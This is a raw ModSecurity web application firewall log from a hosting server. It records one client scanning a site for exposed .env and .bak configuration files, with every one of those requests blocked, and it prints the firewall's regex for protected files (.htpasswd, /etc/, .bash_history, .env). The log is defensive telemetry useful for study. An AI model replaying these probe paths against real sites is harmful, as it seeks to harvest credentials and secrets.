[Tue May 26 13:04:04.637322 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzgAAAFo"]
[Tue May 26 13:04:04.642293 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BxwAAAFY"]
[Tue May 26 13:04:04.643917 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0AAAAF0"]
[Tue May 26 13:04:04.643951 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzAAAAHU"]
[Tue May 26 13:04:04.649442 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4ByAAAACY"]
[Tue May 26 13:04:04.649584 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzwAAAF8"]
[Tue May 26 13:04:04.654768 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BywAAACQ"]
[Tue May 26 13:04:04.655329 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0QAAABo"]
[Tue May 26 13:04:04.661415 2026] [security2:error] [pid 470766:tid 470993] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0gAAAGE"]
[Tue May 26 13:04:04.661802 2026] [security2:error] [pid 470766:tid 470854] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/s3/.env.bak"] [unique_id "ahVM7OjO_W1DqEcFHQ4B4QAAAFc"]
[Tue May 26 13:04:04.675483 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B1gAAAEA"]
[Tue May 26 13:04:04.686955 2026] [security2:error] [pid 470766:tid 471010] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B2wAAAHI"]
[Tue May 26 13:04:04.692347 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B4AAAAGc"]
[Tue May 26 13:04:04.768107 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B6gAAAHw"]
[Tue May 26 13:04:04.786074 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B8AAAAD0"]
[Tue May 26 13:04:04.786949 2026] [security2:error] [pid 470766:tid 470926] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B7wAAAB4"]
[Tue May 26 13:04:04.805480 2026] [security2:error] [pid 470766:tid 470876] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/api/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAwAAMm0"]
[Tue May 26 13:04:04.805594 2026] [security2:error] [pid 470766:tid 470799] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAgAAMiA"]
[Tue May 26 13:04:04.809892 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/backend/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBgAAMhk"]
[Tue May 26 13:04:04.832400 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B_QAAAGk"]
[Tue May 26 13:04:04.837936 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B_gAAAGY"]
[Tue May 26 13:04:04.838982 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAQAAACk"]
[Tue May 26 13:04:04.844584 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B-gAAAFU"]
[Tue May 26 13:04:04.846538 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B-wAAMgk"]
[Tue May 26 13:04:04.846706 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBAAAMh8"]
[Tue May 26 13:04:04.851721 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAAAAAGQ"]
[Tue May 26 13:04:04.858752 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBwAAMhA"]
[Tue May 26 13:04:04.873934 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CCQAAMms"]
[Tue May 26 13:04:04.882112 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CCAAAMnk"]
[Tue May 26 13:04:04.947767 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CDgAAFBU"]
[Tue May 26 13:04:04.965661 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CDwAAFHg"]
[Tue May 26 13:04:04.966175 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CEAAAFBc"]
[Tue May 26 13:04:04.992263 2026] [security2:error] [pid 470766:tid 470777] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/service/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGwAAFAo"]
[Tue May 26 13:04:04.996524 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGQAAAF0"]
[Tue May 26 13:04:04.998638 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGAAAAHU"]
[Tue May 26 13:04:05.004044 2026] [security2:error] [pid 470766:tid 470808] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/services/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CHgAAFCk"]
[Tue May 26 13:04:05.007462 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CFwAAAHg"]
[Tue May 26 13:04:05.029878 2026] [security2:error] [pid 470766:tid 470781] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shared/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CJgAAFA4"]
[Tue May 26 13:04:05.030031 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CHQAAAAE"]
[Tue May 26 13:04:05.056655 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CIgAAFCU"]
[Tue May 26 13:04:05.095791 2026] [security2:error] [pid 470766:tid 470778] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shop/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4COQAAFAs"]
[Tue May 26 13:04:05.106057 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CMwAAAGw"]
[Tue May 26 13:04:05.118241 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNQAAAEY"]
[Tue May 26 13:04:05.124754 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNAAAAEo"]
[Tue May 26 13:04:05.135009 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNgAAAEA"]
[Tue May 26 13:04:05.135594 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4COAAAACQ"]
[Tue May 26 13:04:05.150102 2026] [security2:error] [pid 470766:tid 470820] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/src/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSAAAFDU"]
[Tue May 26 13:04:05.152816 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CQQAAAAA"]
[Tue May 26 13:04:05.157532 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CQgAAAAY"]
[Tue May 26 13:04:05.209590 2026] [security2:error] [pid 470766:tid 470985] [client 4.201.75.230:46023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xxmlrpc.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUAAAAFk"]
[Tue May 26 13:04:05.279846 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSgAAACM"]
[Tue May 26 13:04:05.296074 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSQAAAC8"]
[Tue May 26 13:04:05.299127 2026] [security2:error] [pid 470766:tid 470847] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/srv/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYQAAFFA"]
[Tue May 26 13:04:05.304509 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTwAAFBE"]
[Tue May 26 13:04:05.304522 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTQAAADg"]
[Tue May 26 13:04:05.306374 2026] [security2:error] [pid 470766:tid 470828] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stage/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYgAAFD0"]
[Tue May 26 13:04:05.310317 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTAAAFC4"]
[Tue May 26 13:04:05.313575 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUQAAFDM"]
[Tue May 26 13:04:05.313718 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXQAAFDs"]
[Tue May 26 13:04:05.314597 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUgAAFEE"]
[Tue May 26 13:04:05.317659 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXgAAFD8"]
[Tue May 26 13:04:05.319890 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CVwAAFHY"]
[Tue May 26 13:04:05.320079 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTgAAFEY"]
